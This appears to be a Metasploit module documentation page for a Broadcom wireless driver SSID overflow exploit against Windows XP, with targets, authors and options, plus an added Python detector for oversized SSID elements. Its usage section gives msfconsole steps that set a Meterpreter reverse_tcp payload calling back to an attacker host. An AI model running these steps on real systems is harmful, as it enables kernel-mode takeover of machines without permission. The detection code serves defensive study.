Broadcom Wireless Driver Probe Response SSID Overflow
This module exploits a stack buffer overflow in the Broadcom Wireless driver that allows remote code execution in kernel mode by sending an 802.11 probe response that contains a long SSID. The target MAC address must be provided to use this exploit. The two cards tested fell into the 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
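The bug class described above is an SSID element whose length field exceeds what the driver's stack buffer allows. A wireless IDS or a capture-analysis script can flag such frames without knowing anything about the driver: the 802.11 SSID element is limited to 32 bytes, so any probe response or beacon carrying a longer one is malformed. The following is an added detection example (not part of the Metasploit module or this page); it assumes the caller has already stripped the 24-byte MAC header and hands it the management frame body, and the sample bodies are constructed inline.

```python
import struct

SSID_ELEMENT_ID = 0
SSID_MAX_LEN = 32             # 802.11 limit on the SSID element's length field
FIXED_FIELDS_LEN = 8 + 2 + 2  # timestamp, beacon interval, capability info


def parse_tagged_params(body: bytes):
    """Walk the TLV ("tagged parameter") list of a beacon/probe response body
    and return a list of (element_id, value) tuples. Raises ValueError when an
    element's declared length runs past the end of the body, which is itself
    a sign of a malformed or deliberately crafted frame."""
    offset = FIXED_FIELDS_LEN
    elements = []
    while offset < len(body):
        if offset + 2 > len(body):
            raise ValueError("truncated element header at offset %d" % offset)
        eid, elen = body[offset], body[offset + 1]
        value = body[offset + 2: offset + 2 + elen]
        if len(value) != elen:
            raise ValueError("element %d claims %d bytes, only %d present"
                             % (eid, elen, len(value)))
        elements.append((eid, value))
        offset += 2 + elen
    return elements


def check_probe_response(body: bytes) -> dict:
    """Return a verdict: {'ssid_len': int|None, 'alert': bool, 'reason': str}.
    Alerts on an SSID element longer than the 802.11 maximum and on any
    frame whose element list cannot be parsed cleanly."""
    try:
        elements = parse_tagged_params(body)
    except ValueError as exc:
        return {"ssid_len": None, "alert": True, "reason": "malformed: %s" % exc}
    for eid, value in elements:
        if eid == SSID_ELEMENT_ID:
            if len(value) > SSID_MAX_LEN:
                return {"ssid_len": len(value), "alert": True,
                        "reason": "SSID element length %d exceeds 802.11 maximum of %d"
                                  % (len(value), SSID_MAX_LEN)}
            return {"ssid_len": len(value), "alert": False, "reason": "ok"}
    return {"ssid_len": None, "alert": False, "reason": "no SSID element"}


def build_body(ssid: bytes) -> bytes:
    """Constructed sample frame body: fixed fields, an SSID element and a
    supported-rates element. Used only to exercise the detector."""
    fixed = struct.pack("<QHH", 0, 100, 0x0411)         # timestamp, interval, capabilities
    ssid_ie = bytes([SSID_ELEMENT_ID, len(ssid) & 0xFF]) + ssid
    rates_ie = bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])    # 1, 2, 5.5, 11 Mbit/s (basic)
    return fixed + ssid_ie + rates_ie


# Constructed test inputs, not captures from a real network.
SAMPLE_BENIGN = build_body(b"corpnet")
SAMPLE_OVERSIZED = build_body(b"A" * 200)              # SSID length well past 32
SAMPLE_TRUNCATED = build_body(b"corpnet")[:-3]         # rates element cut short

if __name__ == "__main__":
    for name, body in [("benign", SAMPLE_BENIGN),
                       ("oversized", SAMPLE_OVERSIZED),
                       ("truncated", SAMPLE_TRUNCATED)]:
        print(name, check_probe_response(body))
```

The check is deliberately driver-agnostic: it keys on the protocol limit rather than on the specific buffer size in bcmwl5.sys, so it also covers other SSID-handling bugs in client drivers. Pair it with the ADDR_DST observation from the description: a unicast probe response addressed to a single station that also carries an oversized SSID is a stronger signal than a broadcast one.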
Exploit Rank
- Low
Exploit Authors
- Chris Eagle < >
- Johnny Cache < johnnycsh [at] 802.11mercenary.net >
- skape < mmiller [at] hick.org >
- hdm < hdm [at] metasploit.com >
Exploit Targets
- 0 - Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10 (default)
- 1 - Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10
Exploit Usage Information
$ msfconsole
msf > use exploit/windows/driver/broadcom_wifi_ssid
msf exploit(broadcom_wifi_ssid) > show payloads
msf exploit(broadcom_wifi_ssid) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(broadcom_wifi_ssid) > set LHOST [MY IP ADDRESS]
msf exploit(broadcom_wifi_ssid) > exploit
Exploit Module Options
| Option | Description |
|---|---|
| ADDR_DST | The MAC address of the target system (default: FF:FF:FF:FF:FF:FF) |
| CHANNEL | The initial channel (default: 11) |
| DRIVER | The name of the wireless driver for lorcon (default: autodetect) |
| INTERFACE | The name of the wireless interface (default: wlan0) |
| RUNTIME | The number of seconds to run the attack (default: 60) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
